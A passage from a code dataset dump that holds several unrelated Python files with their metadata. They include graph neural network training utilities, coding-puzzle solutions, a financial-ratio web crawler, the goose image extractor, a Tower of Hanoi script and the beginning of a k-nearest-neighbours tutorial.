args.update(weight_tensor = weight_tensor)\n \n\ndef get_input_generator(args):\n # load and preprocess dataset\n if args.dataset == 'cora':\n data = CoraDataset()\n elif args.dataset == 'citeseer':\n data = CitationGraphDataset('citeseer')\n elif args.dataset == 'pubmed':\n data = CitationGraphDataset('pubmed')\n elif args.dataset == 'PPIDataset':\n data = PPIDataset()\n elif args.dataset == \"karate\":\n data = KarateClub()\n g = data[0]\n g.ndata['feat'] = torch.eye(g.number_of_nodes()).to(args.device)\n g.ndata['train_mask'] = torch.from_numpy(np.ones((g.number_of_nodes(),), dtype=bool)).to(args.device)\n g.ndata['val_mask'] = torch.from_numpy(np.ones((g.number_of_nodes(),), dtype=bool)).to(args.device)\n g.ndata['test_mask'] = torch.from_numpy(np.ones((g.number_of_nodes(),), dtype=bool)).to(args.device)\n elif args.dataset == \"synth\":\n \n output = generate_synthetic_dataset(size_x = args.size_x, graph_type =args.synth_graph_type, ng_path = args.ng_data)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"vicker\":\n output = get_vicker_chan_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"congress\":\n output = get_congress_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"mammo\":\n output = get_mammo_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"balance\":\n output = get_balance_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"leskovec\":\n output = get_leskovec_true_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"webKB_texas_2\":\n output = load_ml_clustering_mat_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset in [\"3sources\", \"BBCSport2view_544\" , \"BBC4view_685\" , \"WikipediaArticles\"]:\n output = load_ml_clustering_scipymat_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n elif args.dataset == \"UCI\":\n output = get_uci_true_dataset(args)\n args.update(graph_obj = output[0])\n args.update(laplacian = output[-2])\n process_adj_mat(output[-1], args)\n return output[:-2]\n else:\n raise ValueError('Unknown dataset: {}'.format(args.dataset))\n\n g = data[0]\n if args.device == 'cuda':\n cuda = False\n else:\n cuda = True\n #g = g.to(args.device)\n \n features = g.ndata['feat']#.unsqueeze( axis = -1)\n labels = g.ndata['label']\n train_mask = g.ndata['train_mask']\n print(sum(train_mask))\n val_mask = g.ndata['val_mask'].type(torch.BoolTensor)\n test_mask = g.ndata['test_mask'].type(torch.BoolTensor)\n if(not (args.dataset == \"karate\")):\n train_mask = ~ (val_mask | test_mask)\n print(sum(train_mask))\n num_feats = features.shape[1]\n n_edges = g.number_of_edges()\n print(\"\"\"----Data statistics------'\n #Edges %d\n #Train samples %d\n #Val samples %d\n #Test samples %d\"\"\" %\n (n_edges,\n train_mask.int().sum().item(),\n val_mask.int().sum().item(),\n test_mask.int().sum().item()))\n\n # remove self loop\n #g = dgl.remove_self_loop(g)\n n_edges = g.number_of_edges()\n nx_g = data[0].to_networkx()\n adj = np.array(nx.convert_matrix.to_numpy_matrix(nx_g))\n adj = make_symmetric(adj)\n adj_list = [adj]\n graphs_list = [nx_g]\n Ls = [sgwt_raw_laplacian(adj)]\n features = torch.tensor(PCA(n_components=args.size_x).fit_transform(g.ndata['feat'].numpy()),dtype=torch.float).to(args.device)\n features_list = [features]\n if(args.create_similarity_layer):\n adj_2 = np.array(kneighbors_graph(g.ndata['feat'].numpy(),n_neighbors = args.num_similarity_neighbors, metric = \"cosine\",include_self = True).todense())\n adj_2 = make_symmetric(adj_2)\n nx_g2 = nx.convert_matrix.from_numpy_array(adj_2, create_using = nx.DiGraph)\n adj_list.append(adj_2)\n graphs_list.append(nx_g2)\n features_list.append(features)\n Ls.append(sgwt_raw_laplacian(adj_2))\n\n\n adj_final = np.stack(adj_list,axis = 2)\n L = np.stack(Ls, axis = 2)\n features = torch.stack(features_list, axis = 2 )\n process_adj_mat(adj_final, args)\n args.update(graph_obj =graphs_list)\n args.update(laplacian=L)\n return graphs_list, features, labels, train_mask, val_mask, test_mask\n\ndef sample_neighbors(graph, args):\n \n input_neighbors = []\n for val in range(args.vocab_size):\n value = val\n neighbors_list = [n for n in graph.neighbors(value)]\n if(neighbors_list):\n input_neighbors.append([value]+list(np.random.choice(neighbors_list, args.num_neighbors, replace=True)))\n else:\n input_neighbors.append([value for _ in range(args.num_neighbors + 1)])\n return input_neighbors\n\ndef get_batch_data_node(graphs, features, train_idx, args):\n '''\n returns:\n X_concat: concatenated features of all the selected graphs\n input_x: neighbor matrix #num_nodes X # num neighbours + 1 \n input_y: 1D Tensor of where the nodes of selected_graph are, in the sparse graph matrix.\n '''\n #X_concat = features[train_idx].to(args.device)\n input_neighbors_per_graph = []\n for graph in graphs:\n input_neighbors_per_graph.append(sample_neighbors(graph,args))\n\n input_x = np.array(input_neighbors_per_graph)\n input_x = torch.from_numpy(input_x).permute(1,2,0).to(args.device)\n input_y = torch.from_numpy(np.array([x for x in range(args.vocab_size)])).to(args.device)\n return features.to(args.device), input_x, input_y\n\n\nclass Batch_Loader_node_classification(object):\n def __init__(self,args):\n init_object = get_input_generator(args)\n self.graph = init_object[0]\n self.graph, self.features, self.label, self.train_mask, self.val_mask, self.test_mask = init_object\n self.args=args\n def __call__(self):\n train_idx = select_bs_indices_from_mask(self.train_mask, self.args.batch_size).to('cpu').numpy()\n \n X_concat, input_x, input_y = get_batch_data_node(self.graph, self.features, train_idx, self.args)\n return X_concat, input_x, input_y\n \n def get_validation_idx(self):\n return select_bs_indices_from_mask(self.test_mask,-1)\n \n def get_test_idx(self):\n return select_bs_indices_from_mask(self.test_mask,-1)\n \n def get_train_idx(self):\n return select_bs_indices_from_mask(self.train_mask,-1)\n\n\n\ndef select_bs_indices_from_mask(boolean_mask,bs):\n all_mask_idx = torch.where(boolean_mask==True)[0]\n if(bs>0):\n selected_idx = np.random.permutation(len(all_mask_idx))[:bs]\n return all_mask_idx[selected_idx]\n return all_mask_idx\n\n\n\n\ndef data_loading_util(args):\n # Load data\n print(\"Loading data...\")\n \n batch_nodes = Batch_Loader_node_classification(args)\n args.update(vocab_size=batch_nodes.features.shape[0])\n args.update(trainset_size=sum(batch_nodes.train_mask).item())\n args.update(feature_dim_size=batch_nodes.features.shape[1])\n data_args= {}\n data_args['batch_nodes'] = batch_nodes\n data_args = Namespace(**data_args)\n print(\"Loading data... finished!\")\n return data_args, args\n\ndef model_creation_util(parameterization,args):\n print(args.feature_dim_size)\n print(args.vocab_size)\n print(\"create model\")\n print(args.model_type)\n args.update(sampler_type = \"neighbor\")\n model_input_args = dict(feature_dim_size=args.feature_dim_size, ff_hidden_size=parameterization['ff_hidden_size'],\n dropout=parameterization['dropout'], num_self_att_layers=parameterization['num_timesteps'],\n vocab_size=args.vocab_size, sampled_num=parameterization['sampled_num'],\n num_U2GNN_layers=parameterization['num_hidden_layers'], device=args.device, sampler_type = args.sampler_type, loss_type = args.loss_type, adj_mat = args.adj_label,single_layer_only = args.single_layer_only, ml_model_type = args.ml_model_type, projection_dim = args.projection_dim)\n \n if(args.single_layer_only):\n if(args.model_type == 'u2gnn'):\n model = TransformerU2GNN(**model_input_args).to(args.device)\n elif(args.model_type == 'gcn'):\n model = TransformerGCN(**model_input_args).to(args.device)\n elif (args.model_type == \"gat\"):\n model = TransformerGAT(**model_input_args).to(args.device)\n else:\n raise ValueError(' {} isnt a valid model'.format(args.model_type))\n\n else:\n model = TransformerMLU2GNN(**model_input_args).to(args.device)\n \n optimizer = torch.optim.Adam(model.parameters(), lr=parameterization['learning_rate'])\n \n if(args.batch_size>0):\n num_batches_per_epoch = int((args.trainset_size- 1) // args.batch_size) + 1\n else:\n num_batches_per_epoch = 1\n print(\"model done\")\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=num_batches_per_epoch, gamma=0.1)\n model_args = {'model':model, 'optimizer':optimizer, 'num_batches_per_epoch':num_batches_per_epoch, 'scheduler':scheduler}\n \n return Namespace(**model_args)\n\ndef loss_func(args, logits):\n if(args.loss_type == 'default'):\n embeds = logits[0]\n loss = torch.sum(embeds)\n \n elif(args.loss_type == 'gae'):\n embeds = logits[0]\n A_pred = torch.sigmoid(torch.matmul(embeds, embeds.t()))\n loss = args.norm*F.binary_cross_entropy(A_pred.view(-1), args.adj_label.view(-1), weight = args.weight_tensor)\n elif( args.loss_type == \"contrastive\"):\n loss = logits[0]\n return loss\n \ndef single_epoch_training_util(data_args, model_args, args):\n model_args.model.train() # Turn on the train mode\n total_loss = 0.\n for _ in range(model_args.num_batches_per_epoch):\n X_concat, input_x, input_y = data_args.batch_nodes()\n model_args.optimizer.zero_grad()\n if(args.single_layer_only):\n logits = model_args.model(X_concat, input_x, input_y, args)\n print(\"forward pass done for single layer\")\n loss = loss_func(args,logits)\n else:\n loss, _ = model_args.model(X_concat, input_x, input_y, args)\n print(\"forward pass done for multi layers\")\n \n loss.backward()\n print(\"backward pass done\")\n #torch.nn.utils.clip_grad_norm_(model_args.model.parameters(), 0.5)\n model_args.optimizer.step()\n total_loss += loss.item()\n\n return total_loss\n\n\ndef get_node_embeddings(data_args, model_args, args):\n model = model_args.model\n model.eval()\n if(args.loss_type == 'default'):\n \n return model.ss.weight.to('cpu')\n \n elif(args.loss_type == 'gae'):\n X_concat, input_x, input_y = data_args.batch_nodes()\n return model(X_concat, input_x, input_y, args)[1].detach().to('cpu')\n elif( args.loss_type == \"contrastive\"):\n X_concat, input_x, input_y = data_args.batch_nodes()\n return model(X_concat, input_x, input_y, args)[1].detach().to('cpu')\n\ndef evaluate(epoch, data_args, model_args, args):\n model = model_args.model\n model.eval() # Turn on the evaluation mode\n with torch.no_grad():\n # evaluating\n node_embeddings = get_node_embeddings(data_args, model_args, args)\n acc_10folds = []\n for fold_idx in range(2):\n if(args.eval_type==\"logistic\"): \n train_idx = data_args.batch_nodes.get_train_idx()\n test_idx = data_args.batch_nodes.get_test_idx()\n train_node_embeddings = node_embeddings[train_idx]\n\n test_node_embeddings = node_embeddings[test_idx]\n train_labels = data_args.batch_nodes.label[train_idx]\n test_labels = data_args.batch_nodes.label[test_idx]\n\n cls = LogisticRegression(solver=\"liblinear\", tol=0.001)\n cls.fit(train_node_embeddings, train_labels)\n ACC = cls.score(test_node_embeddings, test_labels)\n elif(args.eval_type==\"kmeans\"):\n ACC = print_evaluation_from_embeddings(y_true = data_args.batch_nodes.label.numpy(), embeddings = node_embeddings)\n acc_10folds.append(ACC)\n print('epoch ', epoch, ' fold ', fold_idx, ' acc ', ACC)\n\n mean_10folds = statistics.mean(acc_10folds)\n std_10folds = statistics.stdev(acc_10folds)\n # print('epoch ', epoch, ' mean: ', str(mean_10folds), ' std: ', str(std_10folds))\n\n return mean_10folds, std_10folds\n\n\ndef train_evaluate(data_args,model_args,args):\n cost_loss = []\n mean_10folds_best = -1\n std_10folds_best = -1\n train_loss = 0.0\n for epoch in range(1, args.num_epochs + 1):\n epoch_start_time = time.time()\n train_loss = single_epoch_training_util(data_args, model_args, args)\n cost_loss.append(train_loss)\n mean_10folds, std_10folds = evaluate(epoch, data_args, model_args, args)\n print('| epoch {:3d} | time: {:5.2f}s | loss {:5.2f} | mean {:5.2f} | std {:5.2f} | '.format(\n epoch, (time.time() - epoch_start_time), train_loss, mean_10folds*100, std_10folds*100))\n if epoch > 5 and cost_loss[-1] > np.mean(cost_loss[-6:-1]):\n model_args.scheduler.step()\n if(mean_10folds>mean_10folds_best):\n \n mean_10folds_best = mean_10folds\n std_10folds_best = std_10folds\n return mean_10folds_best, std_10folds_best","sub_path":"U2GNN_pytorch/ml_node_train_utils.py","file_name":"ml_node_train_utils.py","file_ext":"py","file_size_in_byte":16605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"412134874","text":"class Solution:\n def trap(self, height: List[int]) -> int:\n n = len(height)\n if n <= 1:\n return 0\n left_max = [0] * n\n right_max = [0] * n\n l_max, r_max = float('-inf'), float('-inf')\n \n for i in range(n-2,-1,-1):\n r_max = max(height[i+1], r_max)\n right_max[i] = r_max\n \n for i in range(1, n):\n l_max = max(height[i-1], l_max)\n left_max[i] = l_max\n \n \n res = 0\n for i in range(1, n-1):\n if height[i] < left_max[i] and height[i] < right_max[i]:\n res += (min(left_max[i], right_max[i]) -height[i])\n return res\n ","sub_path":"Leetcode_250/Problem_42/learning_solution.py","file_name":"learning_solution.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"546532666","text":"n = int(input())\ndishes = [input() for _ in range(n)]\n\nn_melon = 0\neat_count = 0\nis_ready = True\nfor dish in dishes:\n if eat_count > 0:\n is_ready = False\n else:\n is_ready = True\n\n if (dish == \"melon\") and is_ready:\n n_melon += 1\n eat_count = 10\n else:\n eat_count -= 1\n \nprint(n_melon)","sub_path":"paiza/C062.py","file_name":"C062.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"228336037","text":"#coding:utf-8\n\nimport random\n#产生一个随机数X\n# 0 x=36 y=57 100\nin1 = input(\"请输入最小范围\")\nin2 = input(\"请输入最大范围\")\ny = random.randint (in1,in2)\n#print y\nmin = in1\nmax = in2\nind = 0\nwhile 1:\n ind +=1\n x = input(\":>\")\n if x==y: \n print (\"恭喜你,猜对了!\")\n break\n if x>y:\n max=x\n print (\"%s---%s\"%(min,max))\n if x 0:연간, 1:분기\n param = {\n 'pGB': 'S7',\n 'cID': 'S7',\n 'MenuYn': 'N',\n 'ReportGB': 'D',\n 'NewMenuID': '15',\n 'stkGb': '701',\n }\n\n def __init__(self, delay=1):\n self.logger = logger.APP_LOGGER\n self.delay = delay\n\n def crawl_fnguide(self, cmp_cd):\n self.logger.debug(f'Fnguide crawling start')\n\n header = {\n 'Host': 'comp.fnguide.com',\n }\n result = []\n cmp_dict = dict()\n gicode = 'A%06d'%int(cmp_cd)\n cmp_dict['code'] = cmp_cd\n\n for url in [INVEST_URL, FINANCE_RATIO_URL]:\n res = requests.get(f'{url}?gicode={gicode}', headers=header)\n soup = BeautifulSoup(res.text, 'lxml')\n table_list = soup.find_all('table', attrs={'class': 'us_table_ty1'})\n for tb in table_list:\n trs = tb.find_all('tr')[1:]\n for tr in trs:\n td = list(tr.children)\n\n if int(td[1].attrs.get('colspan', 0)) > 0:\n continue\n\n # 지표 key-value\n key = td[1].find_all('span', attrs={'class': 'txt_acd'})\n if len(key) > 0:\n key = key[0].text\n else:\n key = td[1].text\n key = key.strip()\n\n val = td[-2].text.strip()\n if key == 'EV/EBITDA': # 1년주기여서, 작년기준으로 사용\n val = td[-4].text.strip()\n if len(val) > 0:\n try:\n cmp_dict[key] = float(val.replace(',', ''))\n except:\n pass\n result.append(cmp_dict)\n\n timer.random_sleep(min_delay=self.delay)\n\n df_result = pd.DataFrame(result)\n try:\n df_result = df_result[['code', 'EPS', 'CFPS', 'BPS', 'SPS', 'EV/EBITDA', 'ROE']]\n except KeyError:\n self.logger.debug(f\"{df_result[['code']]}, KeyError : ['EV/EBITDA'] not in index\")\n df_result = None\n\n self.logger.debug(f'Fnguide crawling complete')\n return df_result\n","sub_path":"crawler/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"583378585","text":"#initialize the world\r\nfrom cs1robots import *\r\ncreate_world()\r\nhubo = Robot()\r\n\r\nhubo.set_trace(\"blue\")\r\nhubo.set_pause(.1)\r\n\r\ndef turn_right():\r\n for i in range(3):\r\n hubo.turn_left()\r\n \r\n#hubo will run entire screen\r\ndef run_straight():\r\n for i in range(9):\r\n hubo.move()\r\n\r\n#define the very first loop, from bottom to top to bottom \r\ndef loop():\r\n hubo.turn_left() #face up\r\n run_straight() #go to top\r\n turn_right() #face right\r\n hubo.move() #one step forward\r\n turn_right() #face down\r\n run_straight() #go to bottom\r\n hubo.turn_left() #face right\r\n \r\n#will loop 5 times\r\nloop()\r\nhubo.move()\r\nloop()\r\nhubo.move()\r\nloop()\r\nhubo.move()\r\nloop()\r\nhubo.move()\r\nloop()\r\n","sub_path":"Week1/Week1_p1.py","file_name":"Week1_p1.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"50690834","text":"# -*- coding: utf-8 -*-\nimport re\nimport operator\nfrom urlparse import urlparse, urljoin\nfrom goose.utils import FileHelper\nfrom goose.parsers import Parser\nfrom goose.images.Image import Image\nfrom goose.images.ImageUtils import ImageUtils\n\nKNOWN_IMG_DOM_NAMES = [\n \"yn-story-related-media\",\n \"cnn_strylccimg300cntr\",\n \"big_photo\",\n \"ap-smallphoto-a\",\n]\n\n\nclass DepthTraversal(object):\n \n def __init__(self, node, parentDepth, siblingDepth):\n self.node = node\n self.parentDepth = parentDepth\n self.siblingDepth = siblingDepth\n\n\nclass ImageExtractor(object):\n pass\n \n\n\nclass UpgradedImageIExtractor(ImageExtractor):\n \n def __init__(self, httpClient, article, config):\n self.customSiteMapping = {}\n self.loadCustomSiteMapping()\n \n # article\n self.article = article\n \n # config\n self.config = config\n \n # What's the minimum bytes for an image we'd accept is\n self.minBytesForImages = 4000\n \n # the webpage url that we're extracting content from\n self.targetUrl = article.finalUrl\n \n # stores a hash of our url for \n # reference and image processing\n self.linkhash = article.linkhash\n \n # this lists all the known bad button names that we have\n self.matchBadImageNames = re.compile(\n \".html|.gif|.ico|button|twitter.jpg|facebook.jpg|ap_buy_photo\"\n \"|digg.jpg|digg.png|delicious.png|facebook.png|reddit.jpg\"\n \"|doubleclick|diggthis|diggThis|adserver|/ads/|ec.atdmt.com\"\n \"|mediaplex.com|adsatt|view.atdmt\"\n )\n \n \n def getBestImage(self, doc, topNode):\n image = self.checkForKnownElements()\n if image:\n return image\n \n image = self.checkForLargeImages(topNode, 0, 0)\n if image:\n return image\n \n image = self.checkForMetaTag()\n if image:\n return image\n return Image()\n \n \n \n def checkForMetaTag(self):\n image = self.checkForLinkTag()\n if image:\n return image\n image = self.checkForOpenGraphTag()\n if image:\n return image\n \n \n def checkForLargeImages(self, node, parentDepthLevel, siblingDepthLevel):\n \"\"\"\\\n although slow the best way to determine the best image is to download\n them and check the actual dimensions of the image when on disk\n so we'll go through a phased approach...\n 1. get a list of ALL images from the parent node\n 2. filter out any bad image names that we know of (gifs, ads, etc..)\n 3. do a head request on each file to make sure it meets \n our bare requirements\n 4. any images left over let's do a full GET request, \n download em to disk and check their dimensions\n 5. Score images based on different factors like height/width \n and possibly things like color density\n \"\"\"\n goodImages = self.getImageCandidates(node)\n \n if goodImages:\n scoredImages = self.downloadImagesAndGetResults(goodImages, parentDepthLevel)\n if scoredImages:\n highScoreImage = sorted(scoredImages.items(), \n key=lambda x: x[1], reverse=True)[0][0]\n mainImage = Image()\n mainImage.imageSrc = highScoreImage.imgSrc\n mainImage.imageExtractionType = \"bigimage\"\n mainImage.confidenceScore = 100 / len(scoredImages) \\\n if len(scoredImages) > 0 else 0\n return mainImage\n \n depthObj = self.getDepthLevel(node, parentDepthLevel, siblingDepthLevel)\n if depthObj:\n return self.checkForLargeImages(depthObj.node, \n depthObj.parentDepth, depthObj.siblingDepth)\n \n return None\n \n \n def getDepthLevel(self, node, parentDepth, siblingDepth):\n MAX_PARENT_DEPTH = 2\n if parentDepth > MAX_PARENT_DEPTH:\n return None\n else:\n siblingNode = Parser.previousSibling(node)\n if siblingNode is not None:\n return DepthTraversal(siblingNode, parentDepth, siblingDepth + 1)\n elif node is not None:\n parent = Parser.getParent(node)\n if parent is not None:\n return DepthTraversal(parent, parentDepth + 1, 0)\n return None\n \n \n def downloadImagesAndGetResults(self, images, depthLevel):\n \"\"\"\\\n download the images to temp disk and set their dimensions\n - we're going to score the images in the order in which \n they appear so images higher up will have more importance,\n - we'll count the area of the 1st image as a score \n of 1 and then calculate how much larger or small each image after it is\n - we'll also make sure to try and weed out banner \n type ad blocks that have big widths and small heights or vice versa\n - so if the image is 3rd found in the dom it's \n sequence score would be 1 / 3 = .33 * diff \n in area from the first image\n \"\"\"\n imageResults = {}\n initialArea = float(0.0)\n totalScore = float(0.0)\n cnt = float(1.0)\n MIN_WIDTH = 50\n for image in images[:30]:\n imgSrc = Parser.getAttribute(image, attr='src')\n imgSrc = self.buildImagePath(imgSrc)\n locallyStoredImage = self.getLocallyStoredImage(imgSrc)\n width = locallyStoredImage.width\n height = locallyStoredImage.height\n imageSrc = locallyStoredImage.imgSrc\n fileExtension = locallyStoredImage.fileExtension\n \n if fileExtension != '.gif' or fileExtension != 'NA':\n if (depthLevel >= 1 and locallyStoredImage.width > 300) or depthLevel < 1:\n if not self.isBannerDimensions(width, height):\n if width > MIN_WIDTH:\n sequenceScore = float(1.0 / cnt)\n area = float(width * height)\n totalScore = float(0.0)\n \n if initialArea == 0:\n initialArea = area * float(1.48)\n totalScore = 1\n else:\n areaDifference = float(area / initialArea)\n totalScore = sequenceScore * areaDifference\n \n imageResults.update({locallyStoredImage:totalScore})\n cnt += 1\n cnt += 1\n return imageResults\n \n \n def getAllImages(self):\n return None\n \n \n def isBannerDimensions(self, width, height):\n \"\"\"\\\n returns true if we think this is kind of a bannery dimension\n like 600 / 100 = 6 may be a fishy dimension for a good image\n \"\"\"\n if width == height:\n return False\n \n if width > height:\n diff = float(width / height)\n if diff > 5:\n return True\n \n if height > width:\n diff = float(height / width)\n if diff > 5:\n return True\n \n return False\n \n \n def getImagesFromNode(self, node):\n images = Parser.getElementsByTag(node, tag='img')\n if images is not None and len(images) < 1:\n return None\n return images\n \n \n def filterBadNames(self, images):\n \"\"\"\\\n takes a list of image elements \n and filters out the ones with bad names\n \"\"\"\n goodImages = []\n for image in images:\n if self.isOkImageFileName(image):\n goodImages.append(image)\n return goodImages if len(goodImages) > 0 else None\n \n \n def isOkImageFileName(self, imageNode):\n \"\"\"\\\n will check the image src against a list \n of bad image files we know of like buttons, etc...\n \"\"\"\n imgSrc = Parser.getAttribute(imageNode, attr='src')\n \n if not imgSrc:\n return False\n \n if self.matchBadImageNames.search(imgSrc):\n return False\n \n return True\n \n \n def getImageCandidates(self, node):\n goodImages = []\n filteredImages = []\n images = self.getImagesFromNode(node)\n if images:\n filteredImages = self.filterBadNames(images)\n if filteredImages:\n goodImages = self.findImagesThatPassByteSizeTest(filteredImages)\n return goodImages\n \n \n def findImagesThatPassByteSizeTest(self, images):\n \"\"\"\\\n loop through all the images and find the ones \n that have the best bytez to even make them a candidate\n \"\"\"\n cnt = 0\n MAX_BYTES_SIZE = 15728640\n goodImages = []\n for image in images:\n if cnt > 30:\n return goodImages\n imgSrc = Parser.getAttribute(image, attr='src')\n imgSrc = self.buildImagePath(imgSrc)\n locallyStoredImage = self.getLocallyStoredImage(imgSrc)\n if locallyStoredImage:\n bytes = locallyStoredImage.bytes\n if (bytes == 0 or bytes > self.minBytesForImages) \\\n and bytes < MAX_BYTES_SIZE:\n goodImages.append(image)\n else:\n images.remove(image)\n cnt += 1\n return goodImages if len(goodImages) > 0 else None \n \n \n def getNode(self, node):\n return node if node else None\n \n \n def checkForLinkTag(self):\n \"\"\"\\\n checks to see if we were able to \n find open link_src on this page\n \"\"\"\n node = self.article.rawDoc\n meta = Parser.getElementsByTag(node, tag='link', attr='rel', value='image_src')\n for item in meta:\n href = Parser.getAttribute(item, attr='href')\n if href:\n mainImage = Image()\n mainImage.imageSrc = href\n mainImage.imageExtractionType = \"linktag\"\n mainImage.confidenceScore = 100\n locallyStoredImage = self.getLocallyStoredImage(mainImage.imageSrc)\n if locallyStoredImage:\n mainImage.bytes = locallyStoredImage.bytes\n mainImage.height = locallyStoredImage.height\n mainImage.width = locallyStoredImage.width\n return mainImage\n return None\n \n \n \n def checkForOpenGraphTag(self):\n \"\"\"\\\n checks to see if we were able to \n find open graph tags on this page\n \"\"\"\n node = self.article.rawDoc\n meta = Parser.getElementsByTag(node, tag='meta', attr='property', value='og:image')\n for item in meta:\n href = Parser.getAttribute(item, attr='content')\n if href:\n mainImage = Image()\n mainImage.imageSrc = href\n mainImage.imageExtractionType = \"opengraph\"\n mainImage.confidenceScore = 100\n locallyStoredImage = self.getLocallyStoredImage(mainImage.imageSrc)\n if locallyStoredImage:\n mainImage.bytes = locallyStoredImage.bytes\n mainImage.height = locallyStoredImage.height\n mainImage.width = locallyStoredImage.width\n return mainImage\n return None\n \n \n def getLocallyStoredImage(self, imageSrc):\n \"\"\"\\\n returns the bytes of the image file on disk\n \"\"\"\n locallyStoredImage = ImageUtils.storeImageToLocalFile(None, \n self.linkhash, imageSrc, self.config)\n return locallyStoredImage\n \n \n def getCleanDomain(self):\n return self.article.domain.replace('www.', '')\n \n \n def checkForKnownElements(self):\n \"\"\"\\\n in here we check for known image contains from sites \n we've checked out like yahoo, techcrunch, etc... that have\n * known places to look for good images.\n * TODO: enable this to use a series of settings files \n so people can define what the image ids/classes \n are on specific sites\n \"\"\"\n domain = self.getCleanDomain()\n if domain in self.customSiteMapping.keys():\n classes = self.customSiteMapping.get(domain).split('|')\n for classname in classes:\n KNOWN_IMG_DOM_NAMES.append(classname)\n \n knownImage = None\n \n for knownName in KNOWN_IMG_DOM_NAMES:\n known = Parser.getElementById(self.article.rawDoc, knownName)\n if not known:\n known = Parser.getElementsByTag(self.article.rawDoc, \n attr='class', value=knownName)\n if known: known = known[0]\n if known:\n mainImage = Parser.getElementsByTag(known, tag='img')\n if mainImage:\n knownImage = mainImage[0]\n \n \n if knownImage is not None:\n knownImgSrc = Parser.getAttribute(knownImage, attr='src')\n mainImage = Image()\n mainImage.imageSrc = self.buildImagePath(knownImgSrc)\n mainImage.imageExtractionType = \"known\"\n mainImage.confidenceScore = 90\n locallyStoredImage = self.getLocallyStoredImage(mainImage.imageSrc)\n if locallyStoredImage:\n mainImage.bytes = locallyStoredImage.bytes\n mainImage.height = locallyStoredImage.height\n mainImage.width = locallyStoredImage.width\n \n return mainImage\n \n \n def buildImagePath(self, imageSrc):\n \"\"\"\\\n This method will take an image path and build \n out the absolute path to that image\n * using the initial url we crawled \n so we can find a link to the image \n if they use relative urls like ../myimage.jpg\n \"\"\"\n o = urlparse(imageSrc)\n # we have a full url\n if o.hostname :\n return o.geturl()\n # we have a relative url\n return urljoin(self.targetUrl, imageSrc)\n \n \n \n def loadCustomSiteMapping(self):\n # TODO\n dataFile = FileHelper.loadResourceFile(\"images/known-image-css.txt\", \"xx\")\n lines = dataFile.splitlines()\n for line in lines:\n domain, css = line.split('^')\n self.customSiteMapping.update({domain:css})\n \n \n \n \n ","sub_path":"goose/images/UpgradedImageExtractor.py","file_name":"UpgradedImageExtractor.py","file_ext":"py","file_size_in_byte":14860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"286040374","text":"\"\"\"\nproblem: 河內塔\ndexcription:\n 有三根杆子A,B,C。\n A杆上有 N 個 (N>1) 穿孔圓盤,盤的尺寸由下到上依次變小。\n 將所有圓盤移至 C 杆,\n 每次只能移動一個圓盤,\n 大盤不能疊在小盤上面。\n\"\"\"\n\nimport os, time\n\nA = [i for i in range(5,0,-1)]\nB = []\nC = []\n\ndef show():\n os.system(\"clear\")\n print(A, B, C, sep=\"\\n\")\n time.sleep(0.75)\n\ndef hanoi(x, start, middle, end):\n if (x == 1):\n end.append(start.pop())\n show()\n else:\n hanoi(x-1, start, end, middle)\n hanoi(1, start, middle, end)\n hanoi(x-1, middle, start, end)\n\nshow()\nhanoi(len(A), A, B, C)\n","sub_path":"problems/tower_of_hanoi.py","file_name":"tower_of_hanoi.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"274233091","text":"#coding:utf-8\n\"\"\"\nauthor: hxtkyne\nsource: https://github.com/hxtkyne\nreference: machine learning alogrithms\ndescription: knn算法\n在这个主题中,我们将学会\n(1)如何计算数据之间的相似性\n(2)如何利用最相似的特征进行预测\n(3)如何利用knn算法进行分类和回归问题\n思路:一次性存储所有训练数据,当需要预测时,找到k个最相似的训练集,然后取最多的结果或者\n取平均进行处理\n\n扩展:\n(1)调试knn参数,n_neighbors\n(2)结合regression和classification问题\n(3)更多的距离衡量\n(4)数据准备和清洗,标准化,归一化?\n(5)对更多问题进行实验分析\n\"\"\"\nimport math\n\n# 欧拉距离,注意最后一列是输出信息(类别)\ndef euclidean_distance(row1, row2):\n\tdistance = 0.0\n\tfor i in range(len(row1)-1):\n\t\tdistance += (row1[i] -row2[i])**2\n\treturn math.sqrt(distance)\n\n# 获得邻近点\ndef get_neighbors(train, test_row, num_neighbors):\n\tdistances = list()\n\tfor train_row in train:\n\t\tdist = euclidean_distance(test_row, train_row)\n\t\tdistances.append((train_row, dist)) # store as a tuple\n\t# 利用lambda表达式对tuple的第二个值按顺序排列,升序\n\tdistances.sort(key=lambda tup: tup[1])\n\tneighbors = list()\n\tfor i in range(num_neighbors):\n\t\tneighbors.append(distances[i][0])\n\treturn neighbors\n\n# 